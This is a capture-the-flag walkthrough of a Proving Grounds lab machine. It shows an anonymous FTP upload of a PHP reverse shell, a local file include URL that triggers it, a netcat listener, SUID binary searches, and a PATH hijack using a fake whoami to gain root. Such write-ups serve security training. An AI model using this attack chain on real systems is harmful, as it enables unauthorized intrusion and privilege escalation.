Key learning opportunities here:
– Exercise LFI – Local File Include by using anonymous FTP login, upload reverse-php-shell.php into ftp, then call it through a web browser or curl to get the server to execute it, giving you a www-data shell.
– Take advantage of how path statements work and how they’re executed in order of appearance in your path.
– Creating files like the /tmp/whoami to answer the question of a SUID binary verifying your identity.
1. nmap reveals 21, 22 and 80 open
2. I suspected a lfe (Local file inclusion). Initial scans indicated that anon ftp was allowed so I uploaded a php-reverse-shell.php and we’ll call it later to get a local shell.
3. Moving on, #curl 192.168.114.13/robots.txt was disallowed with the message :”You are not a search engine! You can’t read my robots.txt!”
4. Fine. #curl -A “GoogleBot” http://192.168.114.13/robots.txt
User-agent: *
Disallow: /secret_information/
5. Followed the link http://target/secret_information/?lang=en.php and we see the nice php file ready to mess with.
6. Now, we call the reverse shell but first start a netcat listener so that the incoming traffic is accepted:
#nc -nvlp 4444 (Or whatever TCP port you like really. Just edit your reverse php shell to match that port and your local IP.
Kali has reverse shells here: /usr/share/webshells/php/php-reverse-shell.php
7. Anyhow, http://192.168.114.13/secret_information/?lang=/var/ftp/pub/shell.php&cmd=id
8. A reverse shell should pop up in your netcat listener shell. From there we must escalate privileges.
9. We get a shell but it’s pretty useless so python -c ‘import pty; pty.spawn(“/bin/bash”)’
Now we’re in a bash shell. Careful not to break the shell with anything too crazy.
10. Now, a common route is to find SUID binaries we can use to escalate privileges. Those are programs which run as root no matter who runs them. Seems crazy but it works.
Find binaries with the suid bit set: Either one works.
suid #find / -perm -u=s -type f 2>/dev/null
suid #find / -perm -4000 2> /dev/null
11. We find one very interesting file called /home/tom/rootshell. When we run it, it checks to see if we’re ‘tom’ but we’re not BUT! The rootshell.c file is in the same /home/tom dir and if we read the code, we see it calls a command ‘whoami’ but we can take advantage of how Linux/Unix paths work by adding a path statement before other paths and add a file that gets called before the real whoami and answers how the rootshell binary needs to give us root privs.
12. $export PATH=/tmp:$PATH then hit $echo $PATH to see that tmp appears before the others.
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
This just means that we can put an answer to the rootshell.c questions about who we are that’s answered before the other locations by the real whoami binary in /usr/bin/whoami.
13. So, $echo “printf “tom”” > /tmp/whoami and run the binary /home/tom/rootshell, your fake /tmp/whoami will be called before /usr/bin/whoami and the printf answers in the affirmative that you appear to be tom and get root
14. Cat /root/proof.txt into Proving Grounds for credit.
Greg